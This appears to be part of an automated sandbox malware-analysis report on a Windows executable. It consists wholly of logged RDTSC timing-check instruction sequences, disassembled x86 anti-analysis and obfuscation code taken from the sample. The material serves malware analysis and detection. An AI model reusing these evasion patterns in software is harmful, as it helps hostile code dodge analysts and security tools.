Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 5C8D22 second address: 5C8D26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 5C8D26 second address: 5C8D2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 5C8D2A second address: 5C8D30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 5C8D30 second address: 5C8D44 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 pop eax 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 5C8D44 second address: 5C8D49 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 5C8D49 second address: 5C8D58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 5C8D58 second address: 5C8D5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 5C8D5C second address: 5C8D62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 5C8D62 second address: 5C8D68 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 5C8D68 second address: 5C8D6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4DA0014 second address: 4DA006E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 pushfd 0x00000009 jmp 00007F77A0B95E0Ah 0x0000000e xor eax, 41E433A8h 0x00000014 jmp 00007F77A0B95E0Bh 0x00000019 popfd 0x0000001a pushfd 0x0000001b jmp 00007F77A0B95E18h 0x00000020 or esi, 6C62A608h 0x00000026 jmp 00007F77A0B95E0Bh 0x0000002b popfd 0x0000002c popad 0x0000002d mov dword ptr [esp], ebp 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4DA006E second address: 4DA0072 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4DA0072 second address: 4DA008D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F77A0B95E17h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4D70124 second address: 4D70128 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4D70128 second address: 4D7012E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4D7012E second address: 4D7015D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ch, EEh 0x00000005 jmp 00007F77A0BA2875h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push dword ptr [ebp+04h] 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F77A0BA286Dh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4D701FB second address: 4D701FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4D701FF second address: 4D70205 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4D90C90 second address: 4D90C95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4D90C95 second address: 4D90CF6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, edi 0x00000005 mov cl, dh 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, ebp 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F77A0BA286Eh 0x00000012 adc ax, 71B8h 0x00000017 jmp 00007F77A0BA286Bh 0x0000001c popfd 0x0000001d pushfd 0x0000001e jmp 00007F77A0BA2878h 0x00000023 sub esi, 14952C18h 0x00000029 jmp 00007F77A0BA286Bh 0x0000002e popfd 0x0000002f popad 0x00000030 push eax 0x00000031 push eax 0x00000032 push edx 0x00000033 pushad 0x00000034 mov dl, ah 0x00000036 mov ah, dl 0x00000038 popad 0x00000039 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4D90CF6 second address: 4D90D3A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 123CFCEAh 0x00000008 pushfd 0x00000009 jmp 00007F77A0B95E0Bh 0x0000000e xor ah, FFFFFF8Eh 0x00000011 jmp 00007F77A0B95E19h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, ebp 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F77A0B95E0Dh 0x00000022 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4D90D3A second address: 4D90D40 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4D907FD second address: 4D90803 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4D90803 second address: 4D90807 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4D90807 second address: 4D90816 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4D90816 second address: 4D9081C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4D9081C second address: 4D90892 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F77A0B95E0Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F77A0B95E0Ch 0x00000012 xor eax, 2AB4B408h 0x00000018 jmp 00007F77A0B95E0Bh 0x0000001d popfd 0x0000001e mov ax, EA7Fh 0x00000022 popad 0x00000023 pop ebp 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 pushfd 0x00000028 jmp 00007F77A0B95E17h 0x0000002d adc si, 64FEh 0x00000032 jmp 00007F77A0B95E19h 0x00000037 popfd 0x00000038 push esi 0x00000039 pop edi 0x0000003a popad 0x0000003b rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4D9074F second address: 4D90790 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F77A0BA286Fh 0x00000009 or ah, 0000000Eh 0x0000000c jmp 00007F77A0BA2879h 0x00000011 popfd 0x00000012 mov ecx, 23421D17h 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a pop ebp 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e push edi 0x0000001f pop esi 0x00000020 mov eax, edi 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4D9041F second address: 4D9049A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, cx 0x00000006 mov edx, eax 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F77A0B95E15h 0x00000011 xchg eax, ebp 0x00000012 pushad 0x00000013 push ebx 0x00000014 pushfd 0x00000015 jmp 00007F77A0B95E16h 0x0000001a adc eax, 3FC2C8A8h 0x00000020 jmp 00007F77A0B95E0Bh 0x00000025 popfd 0x00000026 pop ecx 0x00000027 popad 0x00000028 mov ebp, esp 0x0000002a jmp 00007F77A0B95E0Fh 0x0000002f pop ebp 0x00000030 pushad 0x00000031 jmp 00007F77A0B95E14h 0x00000036 push eax 0x00000037 push edx 0x00000038 mov di, si 0x0000003b rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4DA0412 second address: 4DA0427 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 4B5CA7FEh 0x00000008 mov al, dh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp], ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4DA0427 second address: 4DA042E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov bh, F5h 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4DA042E second address: 4DA04AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F77A0BA2871h 0x00000009 xor al, 00000036h 0x0000000c jmp 00007F77A0BA2871h 0x00000011 popfd 0x00000012 pushfd 0x00000013 jmp 00007F77A0BA2870h 0x00000018 and cx, D958h 0x0000001d jmp 00007F77A0BA286Bh 0x00000022 popfd 0x00000023 popad 0x00000024 pop edx 0x00000025 pop eax 0x00000026 mov ebp, esp 0x00000028 pushad 0x00000029 pushad 0x0000002a mov ch, 82h 0x0000002c popad 0x0000002d call 00007F77A0BA286Ah 0x00000032 mov ch, 35h 0x00000034 pop ebx 0x00000035 popad 0x00000036 pop ebp 0x00000037 push eax 0x00000038 push edx 0x00000039 jmp 00007F77A0BA2879h 0x0000003e rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4DE001B second address: 4DE006B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b jmp 00007F77A0B95E0Eh 0x00000010 mov dword ptr [esp], ebp 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 jmp 00007F77A0B95E0Dh 0x0000001b pushfd 0x0000001c jmp 00007F77A0B95E10h 0x00000021 or ecx, 3AEFAB98h 0x00000027 jmp 00007F77A0B95E0Bh 0x0000002c popfd 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4DE006B second address: 4DE0090 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F77A0BA2879h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4DE0090 second address: 4DE0094 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4DE0094 second address: 4DE009A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4DE009A second address: 4DE00FD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F77A0B95E12h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F77A0B95E0Dh 0x00000013 and esi, 70C19546h 0x00000019 jmp 00007F77A0B95E11h 0x0000001e popfd 0x0000001f pushfd 0x00000020 jmp 00007F77A0B95E10h 0x00000025 sub si, C1E8h 0x0000002a jmp 00007F77A0B95E0Bh 0x0000002f popfd 0x00000030 popad 0x00000031 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4DE00FD second address: 4DE0104 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4DB060E second address: 4DB0612 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4DB0612 second address: 4DB0618 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4DB0618 second address: 4DB0644 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F77A0B95E0Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F77A0B95E17h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4DB0644 second address: 4DB0685 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F77A0BA2879h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F77A0BA286Ah 0x00000013 xor ax, 2CD8h 0x00000018 jmp 00007F77A0BA286Bh 0x0000001d popfd 0x0000001e movzx esi, dx 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4DB0685 second address: 4DB068B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4DB068B second address: 4DB068F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4DB068F second address: 4DB070E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007F77A0B95E18h 0x0000000e mov ebp, esp 0x00000010 jmp 00007F77A0B95E10h 0x00000015 mov eax, dword ptr [ebp+08h] 0x00000018 pushad 0x00000019 mov bl, al 0x0000001b mov dh, 11h 0x0000001d popad 0x0000001e and dword ptr [eax], 00000000h 0x00000021 jmp 00007F77A0B95E12h 0x00000026 and dword ptr [eax+04h], 00000000h 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d pushfd 0x0000002e jmp 00007F77A0B95E0Dh 0x00000033 add cl, FFFFFFE6h 0x00000036 jmp 00007F77A0B95E11h 0x0000003b popfd 0x0000003c mov di, ax 0x0000003f popad 0x00000040 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4DB070E second address: 4DB072C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop eax 0x00000005 jmp 00007F77A0BA286Fh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pop ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4DB072C second address: 4DB0730 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4DB0730 second address: 4DB0734 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4DB0734 second address: 4DB073A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4D90669 second address: 4D9066F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4D9066F second address: 4D90673 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4DB0189 second address: 4DB01C9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F77A0BA2871h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F77A0BA286Ch 0x00000013 and ax, 2598h 0x00000018 jmp 00007F77A0BA286Bh 0x0000001d popfd 0x0000001e popad 0x0000001f mov ebp, esp 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4DB01C9 second address: 4DB01CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4DB01CD second address: 4DB01D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4DB01D1 second address: 4DB01D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4DB01D7 second address: 4DB01F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F77A0BA2876h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4DB01F8 second address: 4DB01FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4DB0410 second address: 4DB0495 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F77A0BA2877h 0x00000009 or ax, 96FEh 0x0000000e jmp 00007F77A0BA2879h 0x00000013 popfd 0x00000014 mov edx, ecx 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 xchg eax, ebp 0x0000001a pushad 0x0000001b mov si, F83Fh 0x0000001f pushad 0x00000020 mov eax, 6421FAD1h 0x00000025 pushfd 0x00000026 jmp 00007F77A0BA286Eh 0x0000002b and eax, 311F4D28h 0x00000031 jmp 00007F77A0BA286Bh 0x00000036 popfd 0x00000037 popad 0x00000038 popad 0x00000039 push eax 0x0000003a push eax 0x0000003b push edx 0x0000003c jmp 00007F77A0BA2874h 0x00000041 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4DB0495 second address: 4DB049B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4DB049B second address: 4DB049F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4DB049F second address: 4DB04D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007F77A0B95E19h 0x0000000e mov ebp, esp 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F77A0B95E0Dh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4DB04D2 second address: 4DB04D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4DB04D8 second address: 4DB04DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4DB04DC second address: 4DB04F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F77A0BA2872h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4DB04F9 second address: 4DB04FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4DD070D second address: 4DD0713 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4DD0713 second address: 4DD0717 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4DD0717 second address: 4DD071B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4DD071B second address: 4DD072C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c movsx ebx, si 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4DD072C second address: 4DD0731 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4DD0731 second address: 4DD0756 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F77A0B95E15h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov esi, edi 0x00000011 mov si, bx 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4DD0756 second address: 4DD07CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F77A0BA286Eh 0x00000009 and esi, 018BFEA8h 0x0000000f jmp 00007F77A0BA286Bh 0x00000014 popfd 0x00000015 mov ah, 71h 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov ebp, esp 0x0000001c pushad 0x0000001d pushfd 0x0000001e jmp 00007F77A0BA2871h 0x00000023 sbb ecx, 0A90C2C6h 0x00000029 jmp 00007F77A0BA2871h 0x0000002e popfd 0x0000002f mov di, cx 0x00000032 popad 0x00000033 xchg eax, ecx 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007F77A0BA2879h 0x0000003b rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4DD07CC second address: 4DD081E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F77A0B95E17h 0x00000009 jmp 00007F77A0B95E13h 0x0000000e popfd 0x0000000f call 00007F77A0B95E18h 0x00000014 pop eax 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push eax 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4DD081E second address: 4DD0822 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4DD0822 second address: 4DD0828 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4DD0828 second address: 4DD082D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4DD082D second address: 4DD08A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F77A0B95E10h 0x0000000a add eax, 7B25B5B8h 0x00000010 jmp 00007F77A0B95E0Bh 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 xchg eax, ecx 0x0000001a jmp 00007F77A0B95E16h 0x0000001f mov eax, dword ptr [76FB65FCh] 0x00000024 pushad 0x00000025 pushfd 0x00000026 jmp 00007F77A0B95E0Eh 0x0000002b jmp 00007F77A0B95E15h 0x00000030 popfd 0x00000031 mov bh, ah 0x00000033 popad 0x00000034 test eax, eax 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
